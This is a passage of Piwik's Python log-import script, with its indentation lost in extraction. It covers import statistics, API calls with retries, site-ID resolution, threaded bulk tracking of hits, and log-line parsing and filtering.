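#   str(c)          # '4'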
def __init__(self):
self.time_start = None
self.time_stop = None
self.piwik_sites = set() # sites ID
self.piwik_sites_created = [] # (hostname, site ID)
self.piwik_sites_ignored = set() # hostname
self.count_lines_parsed = self.Counter()
self.count_lines_recorded = self.Counter()
# requests that the Piwik tracker considered invalid (or failed to track)
self.invalid_lines = []
# Do not match the regexp.
self.count_lines_invalid = self.Counter()
# Were filtered out.
self.count_lines_filtered = self.Counter()
# No site ID found by the resolver.
self.count_lines_no_site = self.Counter()
# Hostname filtered by config.options.hostnames
self.count_lines_hostname_skipped = self.Counter()
# Static files.
self.count_lines_static = self.Counter()
# Ignored user-agents.
self.count_lines_skipped_user_agent = self.Counter()
# Ignored HTTP errors.
self.count_lines_skipped_http_errors = self.Counter()
# Ignored HTTP redirects.
self.count_lines_skipped_http_redirects = self.Counter()
# Downloads
self.count_lines_downloads = self.Counter()
# Ignored downloads when --download-extensions is used
self.count_lines_skipped_downloads = self.Counter()
# Misc
self.dates_recorded = set()
self.monitor_stop = False
def set_time_start(self):
self.time_start = time.time()
def set_time_stop(self):
self.time_stop = time.time()
def _compute_speed(self, value, start, end):
delta_time = end - start
if value == 0:
return 0
if delta_time == 0:
return 'very high!'
else:
return value / delta_time
def _round_value(self, value, base=100):
return round(value * base) / base
def _indent_text(self, lines, level=1):
"""
Return an indented text. 'lines' can be a list of lines or a single
line (as a string). One level of indentation is 4 spaces.
"""
prefix = ' ' * (4 * level)
if isinstance(lines, basestring):
return prefix + lines
else:
return '\n'.join(
prefix + line
for line in lines
)
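# For example (illustrative): self._indent_text(['a', 'b'], level=2)
# returns "        a\n        b" (each line prefixed with 8 spaces).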
def print_summary(self):
invalid_lines_summary = ''
if self.invalid_lines:
invalid_lines_summary = '''Invalid log lines
-----------------
The following lines were not tracked by Piwik, either due to a malformed tracker request or error in the tracker:
%s
''' % textwrap.fill(", ".join(self.invalid_lines), 80)
print('''
%(invalid_lines)sLogs import summary
-------------------
%(count_lines_recorded)d requests imported successfully
%(count_lines_downloads)d requests were downloads
%(total_lines_ignored)d requests ignored:
%(count_lines_skipped_http_errors)d HTTP errors
%(count_lines_skipped_http_redirects)d HTTP redirects
%(count_lines_invalid)d invalid log lines
%(count_lines_filtered)d filtered log lines
%(count_lines_no_site)d requests did not match any known site
%(count_lines_hostname_skipped)d requests did not match any --hostname
%(count_lines_skipped_user_agent)d requests done by bots, search engines...
%(count_lines_static)d requests to static resources (css, js, images, ico, ttf...)
%(count_lines_skipped_downloads)d requests to file downloads did not match any --download-extensions
Website import summary
----------------------
%(count_lines_recorded)d requests imported to %(total_sites)d sites
%(total_sites_existing)d sites already existed
%(total_sites_created)d sites were created:
%(sites_created)s
%(total_sites_ignored)d distinct hostnames did not match any existing site:
%(sites_ignored)s
%(sites_ignored_tips)s
Performance summary
-------------------
Total time: %(total_time)d seconds
Requests imported per second: %(speed_recording)s requests per second
Processing your log data
------------------------
In order for your logs to be processed by Piwik, you may need to run the following command:
./console core:archive --force-all-websites --force-all-periods=315576000 --force-date-last-n=1000 --url='%(url)s'
''' % {
'count_lines_recorded': self.count_lines_recorded.value,
'count_lines_downloads': self.count_lines_downloads.value,
'total_lines_ignored': sum([
self.count_lines_invalid.value,
self.count_lines_filtered.value,
self.count_lines_skipped_user_agent.value,
self.count_lines_skipped_http_errors.value,
self.count_lines_skipped_http_redirects.value,
self.count_lines_static.value,
self.count_lines_skipped_downloads.value,
self.count_lines_no_site.value,
self.count_lines_hostname_skipped.value,
]),
'count_lines_invalid': self.count_lines_invalid.value,
'count_lines_filtered': self.count_lines_filtered.value,
'count_lines_skipped_user_agent': self.count_lines_skipped_user_agent.value,
'count_lines_skipped_http_errors': self.count_lines_skipped_http_errors.value,
'count_lines_skipped_http_redirects': self.count_lines_skipped_http_redirects.value,
'count_lines_static': self.count_lines_static.value,
'count_lines_skipped_downloads': self.count_lines_skipped_downloads.value,
'count_lines_no_site': self.count_lines_no_site.value,
'count_lines_hostname_skipped': self.count_lines_hostname_skipped.value,
'total_sites': len(self.piwik_sites),
'total_sites_existing': len(self.piwik_sites - set(site_id for hostname, site_id in self.piwik_sites_created)),
'total_sites_created': len(self.piwik_sites_created),
'sites_created': self._indent_text(
['%s (ID: %d)' % (hostname, site_id) for hostname, site_id in self.piwik_sites_created],
level=3,
),
'total_sites_ignored': len(self.piwik_sites_ignored),
'sites_ignored': self._indent_text(
self.piwik_sites_ignored, level=3,
),
'sites_ignored_tips': '''
TIPs:
- if one of these hosts is an alias host for one of the websites
in Piwik, you can add this host as an "Alias URL" in Settings > Websites.
- use --add-sites-new-hosts if you wish to automatically create
one website for each of these hosts in Piwik rather than discarding
these requests.
- use --idsite-fallback to force all these log lines with a new hostname
to be recorded in a specific idsite (for example for troubleshooting/visualizing the data)
- use --idsite to force all lines in the specified log files
to be all recorded in the specified idsite
- or you can also manually create a new Website in Piwik with the URL set to this hostname
''' if self.piwik_sites_ignored else '',
'total_time': self.time_stop - self.time_start,
'speed_recording': self._round_value(self._compute_speed(
self.count_lines_recorded.value,
self.time_start, self.time_stop,
)),
'url': config.options.piwik_api_url,
'invalid_lines': invalid_lines_summary
})
##
## The monitor is a thread that prints a short summary every show_progress_delay seconds.
##
def _monitor(self):
latest_total_recorded = 0
while not self.monitor_stop:
current_total = stats.count_lines_recorded.value
time_elapsed = time.time() - self.time_start
print('%d lines parsed, %d lines recorded, %d records/sec (avg), %d records/sec (current)' % (
stats.count_lines_parsed.value,
current_total,
current_total / time_elapsed if time_elapsed != 0 else 0,
(current_total - latest_total_recorded) / config.options.show_progress_delay,
))
latest_total_recorded = current_total
time.sleep(config.options.show_progress_delay)
def start_monitor(self):
t = threading.Thread(target=self._monitor)
t.daemon = True
t.start()
def stop_monitor(self):
self.monitor_stop = True
class Piwik(object):
"""
Make requests to Piwik.
"""
class Error(Exception):
def __init__(self, message, code = None):
super(Exception, self).__init__(message)
self.code = code
class RedirectHandlerWithLogging(urllib2.HTTPRedirectHandler):
"""
Special implementation of HTTPRedirectHandler that logs redirects in debug mode
to help users debug system issues.
"""
def redirect_request(self, req, fp, code, msg, hdrs, newurl):
logging.debug("Request redirected (code: %s) to '%s'" % (code, newurl))
return urllib2.HTTPRedirectHandler.redirect_request(self, req, fp, code, msg, hdrs, newurl)
@staticmethod
def _call(path, args, headers=None, url=None, data=None):
"""
Make a request to the Piwik site. It is up to the caller to format
arguments, to embed authentication, etc.
"""
if url is None:
url = config.options.piwik_url
headers = headers or {}
if data is None:
# If Content-Type isn't defined, PHP does not parse the request's body.
headers['Content-type'] = 'application/x-www-form-urlencoded'
data = urllib.urlencode(args)
elif not isinstance(data, basestring) and headers['Content-type'] == 'application/json':
data = json.dumps(data)
if args:
path = path + '?' + urllib.urlencode(args)
headers['User-Agent'] = 'Piwik/LogImport'
try:
timeout = config.options.request_timeout
except:
timeout = None # the config global object may not be created at this point
request = urllib2.Request(url + path, data, headers)
# Handle basic auth if auth_user set
try:
auth_user = config.options.auth_user
auth_password = config.options.auth_password
except:
auth_user = None
auth_password = None
if auth_user is not None:
base64string = base64.encodestring('%s:%s' % (auth_user, auth_password)).replace('\n', '')
request.add_header("Authorization", "Basic %s" % base64string)
# Use non-default SSL context if invalid certificates shall be
# accepted.
if config.options.accept_invalid_ssl_certificate and \
sys.version_info >= (2, 7, 9):
ssl_context = ssl.create_default_context()
ssl_context.check_hostname = False
ssl_context.verify_mode = ssl.CERT_NONE
https_handler_args = {'context': ssl_context}
else:
https_handler_args = {}
opener = urllib2.build_opener(
Piwik.RedirectHandlerWithLogging(),
urllib2.HTTPSHandler(**https_handler_args))
response = opener.open(request, timeout = timeout)
result = response.read()
response.close()
return result
@staticmethod
def _call_api(method, **kwargs):
"""
Make a request to the Piwik API taking care of authentication, body
formatting, etc.
"""
args = {
'module' : 'API',
'format' : 'json2',
'method' : method,
'filter_limit' : '-1',
}
# token_auth, by default, is taken from config.
token_auth = kwargs.pop('_token_auth', None)
if token_auth is None:
token_auth = config.options.piwik_token_auth
if token_auth:
args['token_auth'] = token_auth
url = kwargs.pop('_url', None)
if url is None:
url = config.options.piwik_api_url
if kwargs:
args.update(kwargs)
# Convert lists into appropriate format.
# See: http://developer.piwik.org/api-reference/reporting-api#passing-an-array-of-data-as-a-parameter
# Warning: we have to pass the parameters in order: foo[0], foo[1], foo[2]
# and not foo[1], foo[0], foo[2] (it will break Piwik otherwise.)
final_args = []
for key, value in args.iteritems():
if isinstance(value, (list, tuple)):
for index, obj in enumerate(value):
final_args.append(('%s[%d]' % (key, index), obj))
else:
final_args.append((key, value))
# logging.debug('%s' % final_args)
# logging.debug('%s' % url)
res = Piwik._call('/', final_args, url=url)
try:
return json.loads(res)
except ValueError:
raise urllib2.URLError('Piwik returned an invalid response: ' + res)
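# Illustrative sketch of the array flattening above: a call such as
# Piwik._call_api('SitesManager.addSite', urls=['http://a', 'http://b'])
# produces the ordered query parameters urls[0]=http://a and
# urls[1]=http://b, as the Piwik reporting API requires.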
@staticmethod
def _call_wrapper(func, expected_response, on_failure, *args, **kwargs):
"""
Try to make requests to Piwik at most PIWIK_FAILURE_MAX_RETRY times.
"""
errors = 0
while True:
try:
response = func(*args, **kwargs)
if expected_response is not None and response != expected_response:
if on_failure is not None:
error_message = on_failure(response, kwargs.get('data'))
else:
error_message = "didn't receive the expected response. Response was %s " % response
raise urllib2.URLError(error_message)
return response
except (urllib2.URLError, httplib.HTTPException, ValueError, socket.timeout) as e:
logging.info('Error when connecting to Piwik: %s', e)
code = None
if isinstance(e, urllib2.HTTPError):
# See Python issue 13211.
message = 'HTTP Error %s %s' % (e.code, e.msg)
code = e.code
elif isinstance(e, urllib2.URLError):
message = e.reason
else:
message = str(e)
# decorate message w/ HTTP response, if it can be retrieved
if hasattr(e, 'read'):
message = message + ", response: " + e.read()
try:
delay_after_failure = config.options.delay_after_failure
max_attempts = config.options.max_attempts
except NameError:
delay_after_failure = PIWIK_DEFAULT_DELAY_AFTER_FAILURE
max_attempts = PIWIK_DEFAULT_MAX_ATTEMPTS
errors += 1
if errors == max_attempts:
logging.info("Max number of attempts reached, server is unreachable!")
raise Piwik.Error(message, code)
else:
logging.info("Retrying request, attempt number %d" % (errors + 1))
time.sleep(delay_after_failure)
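# Illustrative behaviour (hypothetical settings): with max_attempts=3 and
# delay_after_failure=10, a request that keeps failing is attempted at
# roughly t=0s, t=10s and t=20s, after which Piwik.Error is raised with
# the last error message and HTTP code.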
@classmethod
def call(cls, path, args, expected_content=None, headers=None, data=None, on_failure=None):
return cls._call_wrapper(cls._call, expected_content, on_failure, path, args, headers,
data=data)
@classmethod
def call_api(cls, method, **kwargs):
return cls._call_wrapper(cls._call_api, None, None, method, **kwargs)
##
## Resolvers.
##
## A resolver is a class that turns a hostname into a Piwik site ID.
##
class StaticResolver(object):
"""
Always return the same site ID, specified in the configuration.
"""
def __init__(self, site_id):
self.site_id = site_id
# Go get the main URL
site = piwik.call_api(
'SitesManager.getSiteFromId', idSite=self.site_id
)
if site.get('result') == 'error':
fatal_error(
"cannot get the main URL of this site: %s" % site.get('message')
)
self._main_url = site['main_url']
stats.piwik_sites.add(self.site_id)
def resolve(self, hit):
return (self.site_id, self._main_url)
def check_format(self, format):
pass
class DynamicResolver(object):
"""
Use Piwik API to determine the site ID.
"""
_add_site_lock = threading.Lock()
def __init__(self):
self._cache = {}
if config.options.replay_tracking:
# get existing sites
self._cache['sites'] = piwik.call_api('SitesManager.getAllSites')
def _get_site_id_from_hit_host(self, hit):
return piwik.call_api(
'SitesManager.getSitesIdFromSiteUrl',
url=hit.host,
)
def _add_site(self, hit):
main_url = 'http://' + hit.host
DynamicResolver._add_site_lock.acquire()
try:
# After we obtain the lock, make sure the site hasn't already been created.
res = self._get_site_id_from_hit_host(hit)
if res:
return res[0]['idsite']
# The site doesn't exist.
logging.debug('No Piwik site found for the hostname: %s', hit.host)
if config.options.site_id_fallback is not None:
logging.debug('Using default site for hostname: %s', hit.host)
return config.options.site_id_fallback
elif config.options.add_sites_new_hosts:
if config.options.dry_run:
# Let's just return a fake ID.
return 0
logging.debug('Creating a Piwik site for hostname %s', hit.host)
result = piwik.call_api(
'SitesManager.addSite',
siteName=hit.host,
urls=[main_url],
)
if result.get('result') == 'error':
logging.error("Couldn't create a Piwik site for host %s: %s",
hit.host, result.get('message'),
)
return None
else:
site_id = result['value']
stats.piwik_sites_created.append((hit.host, site_id))
return site_id
else:
# The site doesn't exist, we don't want to create new sites and
# there's no default site ID. We thus have to ignore this hit.
return None
finally:
DynamicResolver._add_site_lock.release()
def _resolve(self, hit):
res = self._get_site_id_from_hit_host(hit)
if res:
# The site already exists.
site_id = res[0]['idsite']
else:
site_id = self._add_site(hit)
if site_id is not None:
stats.piwik_sites.add(site_id)
return site_id
def _resolve_when_replay_tracking(self, hit):
"""
If the parsed site ID is found in _cache['sites'], return the site ID and
main_url; otherwise return a (None, None) tuple.
"""
site_id = hit.args['idsite']
if site_id in self._cache['sites']:
stats.piwik_sites.add(site_id)
return (site_id, self._cache['sites'][site_id]['main_url'])
else:
return (None, None)
def _resolve_by_host(self, hit):
"""
Returns the site ID and site URL for a hit based on the hostname.
"""
try:
site_id = self._cache[hit.host]
except KeyError:
logging.debug(
'Site ID for hostname %s not in cache', hit.host
)
site_id = self._resolve(hit)
logging.debug('Site ID for hostname %s: %s', hit.host, site_id)
self._cache[hit.host] = site_id
return (site_id, 'http://' + hit.host)
def resolve(self, hit):
"""
Return the site ID from the cache if found, otherwise call _resolve.
If replay_tracking option is enabled, call _resolve_when_replay_tracking.
"""
if config.options.replay_tracking:
# Replay tracking only considers piwik.php requests, which don't need a hostname to be imported
return self._resolve_when_replay_tracking(hit)
else:
# Workaround for empty Host bug issue #126
if hit.host.strip() == '':
hit.host = 'no-hostname-found-in-log'
return self._resolve_by_host(hit)
def check_format(self, format):
if config.options.replay_tracking:
pass
elif format.regex is not None and 'host' not in format.regex.groupindex and not config.options.log_hostname:
fatal_error(
"the selected log format doesn't include the hostname: you must "
"specify the Piwik site ID with the --idsite argument"
)
class Recorder(object):
"""
A Recorder fetches hits from the Queue and inserts them into Piwik using
the API.
"""
recorders = []
def __init__(self):
self.queue = Queue.Queue(maxsize=2)
# if bulk tracking disabled, make sure we can store hits outside of the Queue
if not config.options.use_bulk_tracking:
self.unrecorded_hits = []
@classmethod
def launch(cls, recorder_count):
"""
Launch a bunch of Recorder objects in a separate thread.
"""
for i in xrange(recorder_count):
recorder = Recorder()
cls.recorders.append(recorder)
run = recorder._run_bulk if config.options.use_bulk_tracking else recorder._run_single
t = threading.Thread(target=run)
t.daemon = True
t.start()
logging.debug('Launched recorder')
@classmethod
def add_hits(cls, all_hits):
"""
Add a set of hits to the recorders queue.
"""
# Organize hits so that one client IP will always use the same queue.
# We have to do this so visits from the same IP will be added in the right order.
hits_by_client = [[] for r in cls.recorders]
for hit in all_hits:
hits_by_client[hit.get_visitor_id_hash() % len(cls.recorders)].append(hit)
for i, recorder in enumerate(cls.recorders):
recorder.queue.put(hits_by_client[i])
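# Illustrative example of the partitioning above (hypothetical values):
# with two recorders, a hit whose get_visitor_id_hash() is 7 always goes
# to cls.recorders[7 % 2], i.e. recorders[1], so all hits from one
# visitor are replayed in order by a single recorder thread.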
@classmethod
def wait_empty(cls):
"""
Wait until all recorders have an empty queue.
"""
for recorder in cls.recorders:
recorder._wait_empty()
def _run_bulk(self):
while True:
try:
hits = self.queue.get()
except:
# TODO: we should log something here, but when this happens calls into the logging module themselves throw
return
if len(hits) > 0:
try:
self._record_hits(hits)
except Piwik.Error as e:
fatal_error(e, hits[0].filename, hits[0].lineno) # approximate location of error
self.queue.task_done()
def _run_single(self):
while True:
if config.options.force_one_action_interval != False:
time.sleep(config.options.force_one_action_interval)
if len(self.unrecorded_hits) > 0:
hit = self.unrecorded_hits.pop(0)
try:
self._record_hits([hit])
except Piwik.Error as e:
fatal_error(e, hit.filename, hit.lineno)
else:
self.unrecorded_hits = self.queue.get()
self.queue.task_done()
def _wait_empty(self):
"""
Wait until the queue is empty.
"""
while True:
if self.queue.empty():
# We still have to wait for the last queue item being processed
# (queue.empty() returns True before queue.task_done() is
# called).
self.queue.join()
return
time.sleep(1)
def date_to_piwik(self, date):
date, time = date.isoformat(sep=' ').split()
return '%s %s' % (date, time.replace('-', ':'))
def _get_hit_args(self, hit):
"""
Returns the args used in tracking a hit, without the token_auth.
"""
site_id, main_url = resolver.resolve(hit)
if site_id is None:
# This hit doesn't match any known Piwik site.
if config.options.replay_tracking:
stats.piwik_sites_ignored.add('unrecognized site ID %s' % hit.args.get('idsite'))
else:
stats.piwik_sites_ignored.add(hit.host)
stats.count_lines_no_site.increment()
return
stats.dates_recorded.add(hit.date.date())
path = hit.path
if hit.query_string and not config.options.strip_query_string:
path += config.options.query_string_delimiter + hit.query_string
# only prepend main url / host if it's a path
url_prefix = self._get_host_with_protocol(hit.host, main_url) if hasattr(hit, 'host') else main_url
url = (url_prefix if path.startswith('/') else '') + path[:1024]
# handle custom variables before generating args dict
if config.options.enable_bots:
if hit.is_robot:
hit.add_visit_custom_var("Bot", hit.user_agent)
else:
hit.add_visit_custom_var("Not-Bot", hit.user_agent)
hit.add_page_custom_var("HTTP-code", hit.status)
args = {
'rec': '1',
'apiv': '1',
'url': url.encode('utf8'),
'urlref': hit.referrer[:1024].encode('utf8'),
'cip': hit.ip,
'cdt': self.date_to_piwik(hit.date),
'idsite': site_id,
'dp': '0' if config.options.reverse_dns else '1',
'ua': hit.user_agent.encode('utf8')
}
if config.options.replay_tracking:
# prevent the request from being force-recorded when the replay-tracking option is used
args['rec'] = '0'
# idsite is already determined by resolver
if 'idsite' in hit.args:
del hit.args['idsite']
args.update(hit.args)
if hit.is_download:
args['download'] = args['url']
if config.options.enable_bots:
args['bots'] = '1'
if hit.is_error or hit.is_redirect:
args['action_name'] = '%s%sURL = %s%s' % (
hit.status,
config.options.title_category_delimiter,
urllib.quote(args['url'], ''),
("%sFrom = %s" % (
config.options.title_category_delimiter,
urllib.quote(args['urlref'], '')
) if args['urlref'] != '' else '')
)
if hit.generation_time_milli > 0:
args['gt_ms'] = int(hit.generation_time_milli)
if hit.event_category and hit.event_action:
args['e_c'] = hit.event_category
args['e_a'] = hit.event_action
if hit.event_name:
args['e_n'] = hit.event_name
if hit.length:
args['bw_bytes'] = hit.length
# convert custom variable args to JSON
if 'cvar' in args and not isinstance(args['cvar'], basestring):
args['cvar'] = json.dumps(args['cvar'])
if '_cvar' in args and not isinstance(args['_cvar'], basestring):
args['_cvar'] = json.dumps(args['_cvar'])
return args
def _get_host_with_protocol(self, host, main_url):
if '://' not in host:
parts = urlparse.urlparse(main_url)
host = parts.scheme + '://' + host
return host
def _record_hits(self, hits):
"""
Inserts several hits into Piwik.
"""
if not config.options.dry_run:
data = {
'token_auth': config.options.piwik_token_auth,
'requests': [self._get_hit_args(hit) for hit in hits]
}
try:
args = {}
if config.options.debug_tracker:
args['debug'] = '1'
response = piwik.call(
'/piwik.php', args=args,
expected_content=None,
headers={'Content-type': 'application/json'},
data=data,
on_failure=self._on_tracking_failure
)
if config.options.debug_tracker:
logging.debug('tracker response:\n%s' % response)
# check for invalid requests
try:
response = json.loads(response)
except:
logging.info("bulk tracking returned invalid JSON")
# don't display the tracker response if we're debugging the tracker.
# debug tracker output will always break the normal JSON output.
if not config.options.debug_tracker:
logging.info("tracker response:\n%s" % response)
response = {}
if ('invalid_indices' in response and isinstance(response['invalid_indices'], list) and
response['invalid_indices']):
invalid_count = len(response['invalid_indices'])
invalid_lines = [str(hits[index].lineno) for index in response['invalid_indices']]
invalid_lines_str = ", ".join(invalid_lines)
stats.invalid_lines.extend(invalid_lines)
logging.info("The Piwik tracker identified %s invalid requests on lines: %s" % (invalid_count, invalid_lines_str))
elif 'invalid' in response and response['invalid'] > 0:
logging.info("The Piwik tracker identified %s invalid requests." % response['invalid'])
except Piwik.Error as e:
# if the server returned 400 code, BulkTracking may not be enabled
if e.code == 400:
fatal_error("Server returned status 400 (Bad Request).\nIs the BulkTracking plugin disabled?", hits[0].filename, hits[0].lineno)
raise
stats.count_lines_recorded.advance(len(hits))
def _is_json(self, result):
try:
json.loads(result)
return True
except ValueError as e:
return False
def _on_tracking_failure(self, response, data):
"""
Removes the successfully tracked hits from the request payload so
they are not logged twice.
"""
try:
response = json.loads(response)
except:
# the response should be in JSON, but in case it can't be parsed just try another attempt
logging.debug("cannot parse tracker response, should be valid JSON")
return response
# remove the successfully tracked hits from payload
tracked = response['tracked']
data['requests'] = data['requests'][tracked:]
return response['message']
class Hit(object):
"""
A simple container for the data parsed from a single log line.
"""
def __init__(self, **kwargs):
for key, value in kwargs.iteritems():
setattr(self, key, value)
super(Hit, self).__init__()
if config.options.force_lowercase_path:
self.full_path = self.full_path.lower()
def get_visitor_id_hash(self):
visitor_id = self.ip
if config.options.replay_tracking:
for param_name_to_use in ['uid', 'cid', '_id', 'cip']:
if param_name_to_use in self.args:
visitor_id = self.args[param_name_to_use]
break
return abs(hash(visitor_id))
def add_page_custom_var(self, key, value):
"""
Adds a page custom variable to this Hit.
"""
self._add_custom_var(key, value, 'cvar')
def add_visit_custom_var(self, key, value):
"""
Adds a visit custom variable to this Hit.
"""
self._add_custom_var(key, value, '_cvar')
def _add_custom_var(self, key, value, api_arg_name):
if api_arg_name not in self.args:
self.args[api_arg_name] = {}
if isinstance(self.args[api_arg_name], basestring):
logging.debug("Ignoring custom %s variable addition [ %s = %s ], custom var already set to string." % (api_arg_name, key, value))
return
index = len(self.args[api_arg_name]) + 1
self.args[api_arg_name][index] = [key, value]
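# Illustrative result (not executed here): after
# hit.add_page_custom_var('HTTP-code', '404'), hit.args['cvar'] equals
# {1: ['HTTP-code', '404']}; _get_hit_args later JSON-encodes this dict
# before sending the tracking request.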
class Parser(object):
"""
The Parser parses the lines in a specified file and inserts them into
a Queue.
"""
def __init__(self):
self.check_methods = [method for name, method
in inspect.getmembers(self, predicate=inspect.ismethod)
if name.startswith('check_')]
## All check_* methods are called for each hit and must return True if the
## hit can be imported, False otherwise.
def check_hostname(self, hit):
# Check against config.hostnames.
if not hasattr(hit, 'host') or not config.options.hostnames:
return True
# Accept the hostname only if it matches one pattern in the list.
result = any(
fnmatch.fnmatch(hit.host, pattern)
for pattern in config.options.hostnames
)
if not result:
stats.count_lines_hostname_skipped.increment()
return result
def check_static(self, hit):
if hit.extension in STATIC_EXTENSIONS:
if config.options.enable_static:
hit.is_download = True
return True
else:
stats.count_lines_static.increment()
return False
return True
def check_download(self, hit):
if hit.extension in config.options.download_extensions:
stats.count_lines_downloads.increment()
hit.is_download = True
return True
# the file is not in the whitelisted download extensions;
# if it's a known download file type, we shall skip it
elif hit.extension in DOWNLOAD_EXTENSIONS:
stats.count_lines_skipped_downloads.increment()
return False
return True
def check_user_agent(self, hit):
user_agent = hit.user_agent.lower()
for s in itertools.chain(EXCLUDED_USER_AGENTS, config.options.excluded_useragents):
if s in user_agent:
if config.options.enable_bots:
hit.is_robot = True
return True
else:
stats.count_lines_skipped_user_agent.increment()
return False
return True
def check_http_error(self, hit):
if hit.status[0] in ('4', '5'):
if config.options.replay_tracking:
# process error logs for replay tracking, since we don't care if piwik errored the first time
return True
elif config.options.enable_http_errors:
hit.is_error = True
return True
else:
stats.count_lines_skipped_http_errors.increment()
return False
return True
def check_http_redirect(self, hit):
if hit.status[0] == '3' and hit.status != '304':
if config.options.enable_http_redirects:
hit.is_redirect = True
return True
else:
stats.count_lines_skipped_http_redirects.increment()
return False
return True
def check_path(self, hit):
for excluded_path in config.options.excluded_paths:
if fnmatch.fnmatch(hit.path, excluded_path):
return False
# By default, all paths are included.
if config.options.included_paths:
for included_path in config.options.included_paths:
if fnmatch.fnmatch(hit.path, included_path):
return True
return False
return True
@staticmethod
def check_format(lineOrFile):
format = False
format_groups = 0
for name, candidate_format in FORMATS.iteritems():
logging.debug("Check format %s", name)
# skip auto detection for formats that can't be detected automatically
if name == 'ovh':
continue
match = None
try:
if isinstance(lineOrFile, basestring):
match = candidate_format.check_format_line(lineOrFile)
else:
match = candidate_format.check_format(lineOrFile)
except Exception as e:
logging.debug('Error in format checking: %s', traceback.format_exc())
pass
if match:
logging.debug('Format %s matches', name)
# compare format groups if this *BaseFormat has groups() method
try:
# if there's more info in this match, use this format
match_groups = len(match.groups())
logging.debug('Format match contains %d groups' % match_groups)
if format_groups < match_groups:
format = candidate_format
format_groups = match_groups
except AttributeError:
format = candidate_format
else:
logging.debug('Format %s does not match', name)
# if the format is W3cExtendedFormat, check if the logs are from IIS and if so, issue a warning if the
# --w3c-time-taken-milli option isn't set
if isinstance(format, W3cExtendedFormat):
format.check_for_iis_option()
return format
@staticmethod
def detect_format(file):
"""
Return the best matching format for this file, or None if none was found.
"""
logging.debug('Detecting the log format')
format = False
# check the format using the file (for formats like the W3cExtendedFormat one)
format = Parser.check_format(file)
# check the format using the first N lines (to avoid irregular ones)
lineno = 0
limit = 100000
while not format and lineno < limit:
line = file.readline()
if not line: # if at eof, don't keep looping
break
lineno = lineno + 1
logging.debug("Detecting format against line %i" % lineno)
format = Parser.check_format(line)
try:
file.seek(0)
except IOError:
pass
if not format:
fatal_error("cannot automatically determine the log format using the first %d lines of the log file. " % limit +
"\nMaybe try specifying the format with the --log-format-name command line argument." )
return
logging.debug('Format %s is the best match', format.name)
return format
def is_filtered(self, hit):
host = None
if hasattr(hit, 'host'):
host = hit.host
else:
try:
host = urlparse.urlparse(hit.path).hostname
except:
pass
if host:
if config.options.exclude_host and len(config.options.exclude_host) > 0 and host in config.options.exclude_host:
return (True, 'host matched --exclude-host')
if config.options.include_host and len(config.options.include_host) > 0 and host not in config.options.include_host:
return (True, 'host did not match --include-host')
if config.options.exclude_older_than and hit.date < config.options.exclude_older_than:
return (True, 'date is older than --exclude-older-than')
if config.options.exclude_newer_than and hit.date > config.options.exclude_newer_than:
return (True, 'date is newer than --exclude-newer-than')
return (False, None)
def parse(self, filename):
"""
Parse the specified filename and insert hits in the queue.
"""
def invalid_line(line, reason):
stats.count_lines_invalid.increment()
if config.options.debug >= 2:
logging.debug('Invalid line detected (%s): %s' % (reason, line))
def filtered_line(line, reason):
stats.count_lines_filtered.increment()
if config.options.debug >= 2:
logging.debug('Filtered line out (%s): %s' % (reason, line))
if filename == '-':
filename = '(stdin)'
file = sys.stdin
else:
if not os.path.exists(filename):
print >> sys.stderr, "\n=====> Warning: File %s does not exist <=====" % filename
return
else:
if filename.endswith('.bz2'):
open_func = bz2.BZ2File
elif filename.endswith('.gz'):
open_func = gzip.open
else:
open_func = open
file = open_func(filename, 'r')
if config.options.show_progress:
print('Parsing log %s...' % filename)
if config.format:
# The format was explicitly specified.
format = config.format
if isinstance(format, W3cExtendedFormat):
format.create_regex(file)
if format.regex is None:
return fatal_error(
"File is not in the correct format, is there a '#Fields:' line? "
"If not, use the --w3c-fields option."
)
else:
# If the file is empty, don't bother.
data = file.read(100)
if len(data.strip()) == 0:
return
try:
file.seek(0)
except IOError:
pass
format = self.detect_format(file)
if format is None:
return fatal_error(
'Cannot guess the logs format. Please give one using '
'either the --log-format-name or --log-format-regex option'
)
# Make sure the format is compatible with the resolver.
resolver.check_format(format)
if config.options.dump_log_regex:
logging.info("Using format '%s'." % format.name)
if format.regex:
logging.info("Regex being used: %s" % format.regex.pattern)
else:
logging.info("Format %s does not use a regex to parse log lines." % format.name)
logging.info("--dump-log-regex option used, aborting log import.")
os._exit(0)
valid_lines_count = 0
hits = []
lineno = -1
while True:
line = file.readline()
if not line: break
lineno = lineno + 1
try:
line = line.decode(config.options.encoding)
except UnicodeDecodeError:
invalid_line(line, 'invalid encoding')
continue
stats.count_lines_parsed.increment()
if stats.count_lines_parsed.value <= config.options.skip:
continue
match = format.match(line)
if not match:
invalid_line(line, 'line did not match')
continue
valid_lines_count = valid_lines_count + 1
if config.options.debug_request_limit and valid_lines_count >= config.options.debug_request_limit:
if len(hits) > 0:
Recorder.add_hits(hits)
logging.info("Exceeded limit specified in --debug-request-limit, exiting.")
return
hit = Hit(
filename=filename,
lineno=lineno,
status=format.get('status'),
full_path=format.get('path'),
is_download=False,
is_robot=False,
is_error=False,
is_redirect=False,
args={},
)
if config.options.regex_group_to_page_cvars_map:
self._add_custom_vars_from_regex_groups(hit, format, config.options.regex_group_to_page_cvars_map, True)
if config.options.regex_group_to_visit_cvars_map:
self._add_custom_vars_from_regex_groups(hit, format, config.options.regex_group_to_visit_cvars_map, False)
if config.options.regex_groups_to_ignore:
format.remove_ignored_groups(config.options.regex_groups_to_ignore)
# Add http method page cvar
try:
httpmethod = format.get('method')
if config.options.track_http_method and httpmethod != '-':
hit.add_page_custom_var('HTTP-method', httpmethod)
except:
pass
try:
hit.query_string = format.get('query_string')
hit.path = hit.full_path
except BaseFormatException:
hit.path, _, hit.query_string = hit.full_path.partition(config.options.query_string_delimiter)
# W3cExtendedFormat defaults to '-' when there is no query string, but we want an empty string
if hit.query_string == '-':
hit.query_string = ''
hit.extension = hit.path.rsplit('.')[-1].lower()
try:
hit.referrer = format.get('referrer')
if hit.referrer.startswith('"'):
hit.referrer = hit.referrer[1:-1]
except BaseFormatException:
hit.referrer = ''
if hit.referrer == '-':
hit.referrer = ''
try:
hit.user_agent = format.get('user_agent')
# in case a format parser included enclosing quotes, remove them so they are not
# sent to Piwik
if hit.user_agent.startswith('"'):
hit.user_agent = hit.user_agent[1:-1]
except BaseFormatException:
hit.user_agent = ''
hit.ip = format.get('ip')
try:
hit.length = int(format.get('length'))
except (ValueError, BaseFormatException):
# Some lines or formats don't have a length (e.g. 304 redirects, W3C logs)
hit.length = 0
try:
hit.generation_time_milli = float(format.get('generation_time_milli'))
except (ValueError, BaseFormatException):
try:
